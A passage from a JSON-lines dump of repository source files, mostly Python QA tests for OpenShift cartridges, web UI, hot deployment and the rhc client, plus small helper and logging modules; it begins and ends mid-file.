(OSConf.default.conf[\"apps\"][\"server\"][\"username\"], OSConf.default.conf[\"apps\"][\"server\"][\"password\"])\n ret_code = common.grep_web_page(job_url + \"1/consoleText\", \"sleep 30\", option, 7, 15)\n self.assert_equal(ret_code, 0)\n \n self.info(\"=================================\")\n self.info(\"8. Check if the normal app is still available\")\n self.info(\"=================================\")\n ret_code = common.grep_web_page(OSConf.get_app_url(self.app_name), \n self.random_string, \n \"-H 'Pragma: no-cache'\", 5, 30 )\n self.assert_equal(ret_code, 0)\n \n self.info(\"=================================\")\n self.info(\"9. Wait for git push to finish\")\n self.info(\"=================================\")\n deployment_process.wait(5, 10)\n \n self.info(\"=================================\")\n self.info(\"10. Check if jenkins build is finished successfully\")\n self.info(\"=================================\")\n ret_code = common.grep_web_page(job_url + \"1/api/xml\", \n '<result>SUCCESS</result>', option, 60, 30)\n self.assert_equal(ret_code, 0)\n \n self.info(\"=================================\")\n self.info(\"11. Check if the normal app is still available\")\n self.info(\"=================================\")\n ret_code = common.grep_web_page(OSConf.get_app_url(self.app_name), \n self.random_string, \"-H 'Pragma: no-cache'\", 5, 20)\n self.assert_equal(ret_code, 0)\n \n return self.passed(\"[US1178 & US1034] [rhc-cartridge] Create Jenkins cartridge application for CI testing\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JenkinsCITesting)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5874357223510742, "alphanum_fraction": 0.6002938747406006, "avg_line_length": 31.39285659790039, "blob_id": "97c39ce127bdfd1cdc36be304844df9b92e06058", "content_id": "a03413ff05d60a34e066e5c8978684ebab81b4b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2722, "license_type": "no_license", "max_line_length": 164, "num_lines": 84, "path": "/automation/open/testmodules/RT/cartridge/mms_agent_without_mongodb.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#\n# File name: mms_agent_without_mongodb.py\n# Date: 2012/02/27 07:29\n# Author: [email protected]\n#\n\nimport sys\nimport os\n\nimport testcase, common, OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1352][UI][rhc-client]Embed mms-agent without mongodb embeded\"\n self.app_name = common.getRandomString(10)\n self.app_type = 'php'\n self.tcms_testcase_id = 126400\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass MmsAgentWithoutMongodb(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create an app\",\n common.create_app,\n function_parameters=[self.app_name, common.app_types[self.app_type], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True],\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Upload settings.php\" ,\n '''\n cd %s &&\n mkdir -p .openshift/mms &&\n cat <<EOF >.openshift/mms/settings.php\nthis is settings.php\nEOF\n git add .openshift/mms/settings.php\n git commit -m \"settings.php\" &&\n git push\n '''%(self.app_name),\n expect_return=0,\n expect_string_list = [], \n expect_description=\"Uploading settings.php should pass.\"))\n\n self.steps_list.append(testcase.TestCaseStep(\"Embed with 10gen-mms-agent\",\n common.embed,\n function_parameters=[self.app_name, 'add-%s'%common.cartridge_types['10gen'], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_string_list = [\"MongoDB must be embedded before the 10gen MMS Agent\"],\n expect_return=\"!0\"))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MmsAgentWithoutMongodb)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of mms_agent_without_mongodb.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5984358787536621, "alphanum_fraction": 0.6109189391136169, "avg_line_length": 45.81690216064453, "blob_id": "881b434d252564c1ccb5a7201d86b890f5869386", "content_id": "1a8fc05556f4f81add39351479bb1d6db632aa65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6649, "license_type": "no_license", "max_line_length": 246, "num_lines": 142, "path": "/automation/open/testmodules/UI/web/case_122221.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_122221.py\n# Date: 2012/06/29 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CheckHomeContent(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.go_to_home()\n #web.go_to_signin()\n #web.login()\n #Assert all the elements on home page (except for the footer).\n web.assert_text_equal_by_xpath('LEARN MORE',\n '''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[1]/a/span''')\n web.assert_text_equal_by_xpath('GET STARTED',\n '''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[2]/a/span''')\n web.assert_text_equal_by_xpath('DEVELOPERS',\n '''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[4]/a/span''')\n web.assert_text_equal_by_xpath('COMMUNITY',\n '''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[5]/a/span''')\n web.assert_text_equal_by_xpath('DEVELOP AND SCALE APPS IN THE CLOUD',\n '''//nav[@id='nav']/div[2]/div/h1''')\n web.assert_text_equal_by_xpath('''OpenShift is Red Hat's free, auto-scaling Platform as a Service (PaaS) for applications. As an application platform in the cloud, OpenShift manages the stack so you can focus on your code.''',\n '''//nav[@id='nav']/div[2]/div/h2''')\n web.assert_text_equal_by_xpath('GET STARTED IN THE CLOUD',\n '''//div[@id='learn']/div/div/a/div''')\n web.assert_text_equal_by_xpath('''SIGN UP - IT'S FREE''',\n '''//div[@id='learn']/div/div/a/div[2]''')\n web.assert_text_equal_by_xpath('Java, Ruby, Node.js, Python, PHP, or Perl',\n '''//div[@id='learn']/div/div/div/ul/li/a/h4''')\n web.assert_text_equal_by_xpath('Code in your favorite language, framework, and middleware. Grow your applications easily with resource scaling.','''//div[@id='learn']/div/div/div/ul/li/a/p''')\n web.assert_text_equal_by_xpath('Announcing the first tier of OpenShift pricing',\n '''//div[@id='learn']/div/div/div[2]/ul/li/a/h4''')\n web.assert_text_equal_by_xpath(\"We're announcing OpenShift pricing for the first paid tier offering, along with our plan to continue a free offering like the one that developers are currently enjoying in the OpenShift Developer Preview.\",\n '''//div[@id='learn']/div/div/div[2]/ul/li/a/p''')\n web.assert_text_equal_by_xpath('Super Fast!',\n '''//div[@id='learn']/div/div/div/ul/li[2]/a/h4''')\n web.assert_text_equal_by_xpath('Code and deploy to the cloud in minutes. Faster and easier than it has ever been.',\n '''//div[@id='learn']/div/div/div/ul/li[2]/a/p''')\n web.assert_text_equal_by_xpath('Build your apps with JBoss EAP 6',\n '''//div[@id='learn']/div/div/div[2]/ul/li[2]/a/h4''')\n web.assert_text_equal_by_xpath('Market-leading open source enterprise platform for next-generation, highly transactional enterprise Java applications. Build and deploy enterprise Java on OpenShift!',\n '''//div[@id='learn']/div/div/div[2]/ul/li[2]/a/p''')\n web.assert_text_equal_by_xpath('No Lock-In',\n '''//div[@id='learn']/div/div/div/ul/li[3]/a/h4''')\n web.assert_text_equal_by_xpath('Built on open technologies so you can take it with you.',\n '''//div[@id='learn']/div/div/div/ul/li[3]/a/p''')\n web.assert_text_equal_by_xpath('Find answers in the Developer Center',\n '''//div[@id='learn']/div/div/div[2]/ul/li[3]/a/h4''')\n web.assert_text_equal_by_xpath('Building applications involves lots of questions and we want you to find those answers fast. The new Developer Center will centralize and organize all our reference material.',\n '''//div[@id='learn']/div/div/div[2]/ul/li[3]/a/p''')\n \n\n #check weather the links are correct\n #LEARN MORE\n web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[1]/a/span''')\n time.sleep(2)\n web.check_title(\"About the OpenShift Platform as a Service (PaaS) | OpenShift by Red Hat\")\n\n #GET STARTED\n web.go_to_home()\n web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[2]/a/span''')\n web.check_title(\"Get Started with OpenShift | OpenShift by Red Hat\")\n\n #LOGO\n web.go_to_home()\n web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/div/a/div[1]''')\n web.assert_text_equal_by_xpath('BUZZ',\n '''/html/body/div[@id='buzz']/div/div/div/div/h2/strong''',\n 'Check the Buzz part is missing')\n\n #DEVELOPERS\n web.go_to_home()\n web.click_element_by_xpath('''/html/body/header/nav[@id='nav']/div[1]/div/ul/li[4]/a/span''')\n time.sleep(2)\n web.check_title(\"Developer Center | OpenShift by Red Hat\")\n\n #COMMUNITY\n web.go_to_home()\n web.click_element_by_link_text(\"COMMUNITY\")\n web.check_title(\"Welcome to OpenShift | OpenShift by Red Hat\")\n\n #Other links\n web.go_to_home()\n web.click_element_by_xpath(\"//div[@id='learn']/div/div/div/ul/li/a/p\")\n web.check_title(\"About the OpenShift Platform as a Service (PaaS) | OpenShift by Red Hat\")\n\n web.go_to_home()\n web.click_element_by_xpath(\"//div[@id='learn']/div/div/div[2]/ul/li/a/p\")\n web.check_title(\"Pricing | OpenShift by Red Hat\")\n\n web.go_to_home()\n web.click_element_by_xpath(\"//div[@id='learn']/div/div/div/ul/li[2]/a/p\")\n web.check_title(\"About the OpenShift Platform as a Service (PaaS) | OpenShift by Red Hat\")\n\n web.go_to_home()\n web.click_element_by_xpath(\"//div[@id='learn']/div/div/div/ul/li[3]/a/p\")\n web.check_title(\"About the OpenShift Platform as a Service (PaaS) | OpenShift by Red Hat\")\n\n web.go_to_home()\n web.click_element_by_xpath(\"//div[@id='learn']/div/div/div[2]/ul/li[3]/a/p\")\n web.check_title(\"Developer Center | OpenShift by Red Hat\")\n self.tearDown()\n\n return self.passed(\"Case 122221 test passed.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckHomeContent)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_122221.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6228753328323364, "alphanum_fraction": 0.6299574971199036, "avg_line_length": 41.787879943847656, "blob_id": "b604f4d14ad6974394091049a7bd7f53ff59d922", "content_id": "03cb3290059a7be82fa1d0aaa65abd445eb63a96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2824, "license_type": "no_license", "max_line_length": 116, "num_lines": 66, "path": "/automation/open/testmodules/RT/hot_deploy/jbossas_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nJul 26, 2012\n\n\n\"\"\"\nimport rhtest\nimport common\nfrom hot_deploy_test import HotDeployTest\n\nclass JBossHotDeployWithoutJenkins(HotDeployTest):\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_name = common.getRandomString()\n self.config.application_type = common.app_types['jbossas']\n self.config.application_type_no_version = \"jbossas\"\n self.config.scalable = False\n self.config.jenkins_is_needed = False\n self.config.summary = \"JBoss AS Hot Deployment Test without Jenkins\" \n #self.config.pid_file = '/app-root/runtime/jbossas.pid'\n #if self.config.application_type = \"jbossas-7\":\n # self.config.pid_file = '/app-root/runtime/jbossas.pid'\n #elif self.config.application_type in [\"jbossews-1.0\", \"jbossews-2.0\"]:\n # self.config.pid_file = '/jbossews/run/jboss.pid'\n #elif self.config.application_type = \"jbosseap-6.0\":\n # self.config.pid_file = '/app-root/runtime/jbosseap.pid'\n \n def configuration(self):\n self.log_info(\"Creating the application to check PID\")\n self.config.file_name = \"pid.jsp\"\n if self.config.application_type == \"jbossas-7\":\n self.config.pid_file = '/app-root/runtime/jbossas.pid'\n elif self.config.application_type in [\"jbossews-1.0\", \"jbossews-2.0\"]:\n self.config.pid_file = '/jbossews/run/jboss.pid'\n elif self.config.application_type == \"jbosseap-6.0\":\n self.config.pid_file = '/app-root/runtime/jbosseap.pid'\n self.info(\"Editing file '%s'...\" % self.config.file_name)\n jsp_file = open(\"./%s/src/main/webapp/%s\" % (self.config.application_name, self.config.file_name), \"w\")\n jsp_file.write('<%@ page contentType=\"text/plain\" %>\\n')\n jsp_file.write('<%@ page trimDirectiveWhitespaces=\"true\" %>\\n')\n jsp_file.write('<%@ page import=\"java.io.FileReader\" %>\\n')\n jsp_file.write('<%@ page import=\"java.io.BufferedReader\" %>\\n')\n jsp_file.write('<%\\n')\n jsp_file.write('String pid_file_name = System.getenv(\"OPENSHIFT_HOMEDIR\") + \"%s\";\\n' % self.config.pid_file)\n jsp_file.write('BufferedReader fileStream = new BufferedReader(new FileReader(pid_file_name));\\n')\n jsp_file.write('String line = null;\\n')\n jsp_file.write('while ( (line = fileStream.readLine()) !=null ) {\\n')\n jsp_file.write('out.print(line);\\n')\n jsp_file.write('}\\n')\n jsp_file.write('%>\\n')\n jsp_file.close()\n self.deploy()\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JBossHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6631016135215759, "alphanum_fraction": 0.6631016135215759, "avg_line_length": 61.5, "blob_id": "6027b2328fc190d9a5f46b476248791870ac8552", "content_id": "35888c96f2b24a65e6dec83d6ac06b8bfe3dcac6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 374, "license_type": "no_license", "max_line_length": 79, "num_lines": 6, "path": "/automation/clicksubmenu.js", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "String cssLocatorOfTheElement=....//locator of the element to click on \nJavascriptExecutor js = (JavascriptExecutor) driver;\n StringBuilder stringBuilder = new StringBuilder();\n stringBuilder.append(\"var x = $(\\'\"+cssLocatorOfTheElement+\"\\');\");\n stringBuilder.append(\"x.click();\");\n js.executeScript(stringBuilder.toString());" }, { "alpha_fraction": 0.6188924908638, "alphanum_fraction": 0.6319218277931213, "avg_line_length": 21.439023971557617, "blob_id": "96d897c5fc258042136a76910c0529f7a4503ada", "content_id": "6039fe5ca69c38fcda5e4465137884b164f76933", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 921, "license_type": "no_license", "max_line_length": 76, "num_lines": 41, "path": "/automation/open/lib/clog.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "'''\n File name: clog.py\n Date: 2012/09/11 15:09\n Author: [email protected]\n'''\n\nimport os\nimport sys\nimport logging, logging.handlers\n\nlog=None\n\ndef _config_logger(level=logging.INFO):\n # create formatter\n formatter = logging.Formatter(\"%(levelname)s [%(asctime)s] %(message)s\",\n \"%H:%M:%S\")\n logger = logging.getLogger(\"dump_logs\")\n log_formatter = logging.Formatter(\n \"%(name)s: %(asctime)s - %(levelname)s: %(message)s\")\n \n stream_handler = logging.StreamHandler(sys.stdout)\n stream_handler.setFormatter(formatter)\n stream_handler.setLevel(level)\n logger.setLevel(level)\n logger.addHandler(stream_handler)\n return logger\n\n\n\ndef get_logger():\n global log\n if log is None:\n level = logging.INFO\n if os.getenv('RHTEST_DEBUG'):\n level=logging.DEBUG\n log = _config_logger(level)\n return log\n\nlog = get_logger()\n\n# end of clog.py \n" }, { "alpha_fraction": 0.6028181314468384, "alphanum_fraction": 0.623954176902771, "avg_line_length": 25.705883026123047, "blob_id": "a3235e0918980b3edd86e3ba36b5722787706812", "content_id": "8fc80419a4097041f78ed88e69181bed104996cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2271, "license_type": "no_license", "max_line_length": 114, "num_lines": 85, "path": "/automation/open/testmodules/UI/web/case_174336.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_174336.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CreateJbossEapAppAndChangeDomainName(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n\n #create a jbosseap app\n web.create_app(\"jbosseap-6.0\",\"jbosseap\")\n\n #check wether the links are correct\n time.sleep(5)\n \n #check the \"appurl\" link\n web.go_to_app_detail(\"jbosseap\")\n web.click_element_by_link_text('''http://jbosseap-'''+web.domain+'''.'''+web.platform+'''.rhcloud.com/''')\n time.sleep(2)\n web.assert_text_equal_by_xpath(\"Welcome To OpenShift, JBossEAP6.0 Cartridge\",'''//h1''') \n \n #go to my account page and change domain name\n web.go_to_domain_edit()\n web.input_by_id(\"domain_name\",\"yujzhangcccc\")\n web.click_element_by_id(\"domain_submit\")\n time.sleep(10)\n \n #check the url after changed the domain name\n web.go_to_app_detail(\"jbosseap\")\n web.click_element_by_link_text('''http://jbosseap-yujzhangcccc.'''+web.platform+'''.rhcloud.com/''')\n time.sleep(2)\n web.assert_text_equal_by_xpath(\"Welcome To OpenShift, JBossEAP6.0 Cartridge\",'''//h1''') \n\n #change the domain name back\n web.go_to_domain_edit()\n web.input_by_id(\"domain_name\",web.domain)\n web.click_element_by_id(\"domain_submit\")\n time.sleep(10)\n \n #delete a jbosseap app\n web.delete_last_app(\"jbosseap\")\n\n\n self.tearDown()\n\n return self.passed(\" case_174336--CreateJbossEapAppAndChangeDomainName passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateJbossEapAppAndChangeDomainName)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_174336.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5306689739227295, "alphanum_fraction": 0.5355845093727112, "avg_line_length": 36.43199920654297, "blob_id": "4c30363f5ab4ce8e56d2f29b43be0b01d1704bb9", "content_id": "a2b4d34662de7f233d4b3abf1a0ae7c8e08633e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4679, "license_type": "no_license", "max_line_length": 148, "num_lines": 125, "path": "/automation/open/testmodules/RT/quick_start/quick_start_redis.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nApr 30, 2012\n\n\"\"\"\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport rhtest\nfrom quick_start_test import QuickStartTest\nimport fileinput\nimport re\n\n\nclass QuickStartRedis(QuickStartTest):\n\n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"ruby\"]\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: Redis\"\n self.config.git_upstream_url = \"git://github.com/openshift/redis-openshift-example.git\"\n self.config.random_value = common.getRandomString()\n self.config.page = \"redis-read\" # means '/'\n self.config.page_pattern = self.config.random_value\n\n def post_configuration_steps(self):\n \n try:\n for line in fileinput.input(\"./%s/config.ru\" % ( self.config.application_name ), inplace = True):\n if re.search(r'map.+health.+do', line):\n print \"require 'redis'\\n\"\n print \"map '/redis-write' do\"\n print \" redis_write = proc do |env|\"\n print \" redis = Redis.new(:path => '/tmp/redis.sock')\"\n #print \" redis = Redis.new(:path => ENV['OPENSHIFT_HOMEDIR'] + '%s' + '/tmp/redis.sock')\" %(self.config.application_type)\n print \" redis.set 'myword', '%s'\" % self.config.random_value\n print \" [ 200, { 'Content-Type' => 'text/plain' }, ['DB_OPERATION_SUCCESS']]\"\n print \" end\"\n print \" run redis_write\"\n print \"end\"\n print \n print \"map '/redis-read' do\"\n print \" redis_read = proc do |env|\"\n print \" redis = Redis.new(:path => '/tmp/redis.sock')\"\n #print \" redis = Redis.new(:path => ENV['OPENSHIFT_HOMEDIR'] + '%s' + '/tmp/redis.sock')\" %(self.config.application_type)\n print \" myword = redis.get 'myword'\"\n print \" [ 200, { 'Content-Type' => 'text/plain' }, [ myword ]]\"\n print \" end\"\n print \" run redis_read\"\n print \"end\"\n print\n print line,\n except Exception as e:\n fileinput.close()\n print type(e)\n print e.args\n self.fail(\"Configuration of the test-application must be successful\")\n finally:\n fileinput.close()\n\n #\n # Creating Gemfile\n #\n Gemfile = open(self.config.application_name + \"/Gemfile\", \"w\")\n Gemfile.write('source \"http://rubygems.org/\"\\n')\n Gemfile.write('gem \"rack\"\\n')\n Gemfile.write('gem \"thread-dump\"\\n')\n Gemfile.write('gem \"redis\"\\n')\n Gemfile.close()\n\n Gemfile_lock = open(self.config.application_name + \"/Gemfile.lock\", \"w\")\n Gemfile_lock.write(\"GEM\\n\")\n Gemfile_lock.write(\" remote: http://rubygems.org/\\n\")\n Gemfile_lock.write(\" specs:\\n\")\n Gemfile_lock.write(\" rack (1.4.1)\\n\")\n Gemfile_lock.write(\" redis (3.0.1)\\n\")\n Gemfile_lock.write(\" thread-dump (0.0.5)\\n\")\n Gemfile_lock.write(\"\\n\")\n Gemfile_lock.write(\"PLATFORMS\\n\")\n Gemfile_lock.write(\" ruby\\n\")\n Gemfile_lock.write(\"\\n\")\n Gemfile_lock.write(\"DEPENDENCIES\\n\")\n Gemfile_lock.write(\" rack\\n\")\n Gemfile_lock.write(\" redis\\n\")\n Gemfile_lock.write(\" thread-dump\\n\")\n Gemfile_lock.close()\n\n\n configuration_steps = [\n \"cd %s\" % self.config.application_name,\n #\"bundle\",\n \"git add .\",\n \"git commit -a -m testing\",\n ]\n\n ret_code = common.command_get_status(\" && \".join(configuration_steps))\n self.assert_equal(ret_code, 0, \"Configuration must be successfull\")\n\n def post_deployment_steps(self):\n ret_code = common.check_web_page_output(\n self.config.application_name,\n \"redis-write\",\n \"DB_OPERATION_SUCCESS\" \n )\n self.assert_equal(ret_code, 0, \"Writing to Redis DB must be successful\")\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartRedis)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6717791557312012, "alphanum_fraction": 0.6978527903556824, "avg_line_length": 18.147058486938477, "blob_id": "0ff766505b093a1e83223b1c4ed7a79a8ed1b884", "content_id": "9fb95410cb2d5786478eb8cddded4c9d106b9ed6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "no_license", "max_line_length": 81, "num_lines": 34, "path": "/automation/open/testmodules/RT/cartridge/jbossews_scaling_java7.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\[email protected]\n\nNov 28, 2012\n\"\"\"\n\nimport rhtest\nimport common\nimport os\nfrom shutil import rmtree\nfrom time import sleep\nfrom jbossews_java7 import EWSJava7Test\n\nclass EWSScalingJava7Test(EWSJava7Test):\n\n def __init__(self, config):\n EWSJava7Test.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2513] Java 7 with scaling JbossEWS application\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EWSScalingJava7Test)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n" }, { "alpha_fraction": 0.541124165058136, "alphanum_fraction": 0.5471578240394592, "avg_line_length": 33.988887786865234, "blob_id": "49433fe1c634468830a13736e00bad31cb44d61c", "content_id": "267aafe97a05d00a1c95ad61683c54e72f97a769", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3149, "license_type": "no_license", "max_line_length": 137, "num_lines": 90, "path": "/automation/open/testmodules/RT/client/rhc_wrapper_ssh.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.key_filename = \"/tmp/libra_id_rsa1-%s\"%(os.getpid())\n tcms_testcase_id = 131033\n common.env_setup()\n self.key_name = common.getRandomString(10)\n self.steps_list = []\n\n def finalize(self):\n common.update_sshkey()\n os.system(\"rm -rf %s\"%self.key_filename)\n\n\nclass RhcWrapperSsh(OpenShiftTest):\n def test_method(self):\n step = testcase.TestCaseStep(\"Create additional key\" ,\n \"ssh-keygen -f %s -N '' \"%self.key_filename,\n expect_return=0)\n self.steps_list.append(step)\n\n \n step = testcase.TestCaseStep(\"rhc help sshkey\" ,\n \"rhc help sshkey\",\n expect_return=0,\n expect_string_list=[\"list\", \"add\", \"remove\"])\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc sshkey add...\",\n common.add_sshkey,\n function_parameters=[\"%s.pub\" % self.key_filename, self.key_name, self.user_email, self.user_passwd],\n expect_return=0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"rhc sshkey list...\",\n \"rhc sshkey list -l %s -p %s %s\"%(self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0,)\n self.steps_list.append(step)\n\n\n step = testcase.TestCaseStep(\"rhc sshkey remove...\",\n common.remove_sshkey,\n function_parameters=[self.key_name, self.user_email, self.user_passwd],\n expect_return=0)\n self.steps_list.append(step)\n '''\n step = testcase.TestCaseStep(\"Copy new keys to correct place\" ,\n \"cp %s.pub $HOME/.ssh/id_rsa.pub && cp %s $HOME/.ssh/id_rsa\" %(self.key_filename, self.key_filename),\n expect_return=0)\n self.steps_list.append(step)\n '''\n\n\n case = testcase.TestCase(\"[US1317][UI][CLI]rhc wrapper - rhc sshkey\", steps=self.steps_list)\n case.run()\n \n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcWrapperSsh)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.7150837779045105, "alphanum_fraction": 0.7290502786636353, "avg_line_length": 24.571428298950195, "blob_id": "2035f9f30be6049b464778af7ab734764027a13c", "content_id": "4334d1eb26c176e25bc2e9634583ca4e763cfede", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 716, "license_type": "no_license", "max_line_length": 118, "num_lines": 28, "path": "/automation/open/testmodules/RT/hot_deploy/nodejs_scaling_without_jenkins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\nNov 13, 2012\n\"\"\"\n\nimport rhtest\nimport common\nfrom nodejs_without_jenkins import NodeJSHotDeployWithoutJenkins\n\nclass NodeJSScalingHotDeployWithoutJenkins(NodeJSHotDeployWithoutJenkins):\n def __init__(self, config):\n NodeJSHotDeployWithoutJenkins.__init__(self, config)\n self.config.scalable = True\n self.config.summary = \"[US2747][RT]Hot deployment support for scalable application - without Jenkins - nodejs\"\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(NodeJSScalingHotDeployWithoutJenkins)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6127892136573792, "alphanum_fraction": 0.6160025596618652, "avg_line_length": 27.290908813476562, "blob_id": "1e5e3faab5c0d68e7cf4b974833255e55c8c85c8", "content_id": "06afdba36a4ecb2845fbe956a809393041b14c69", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3112, "license_type": "no_license", "max_line_length": 78, "num_lines": 110, "path": "/python-simple-cmd/scmd/__init__.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "import inspect\nimport optparse\nimport pkg_resources\nimport sys\n\nfrom scmd.utils.misc import walk_modules\nfrom scmd.command import BaseCommand\nfrom scmd.exceptions import UsageError\n\n\ndef _iter_command_classes(module_name):\n for module in walk_modules(module_name):\n for obj in vars(module).itervalues():\n if 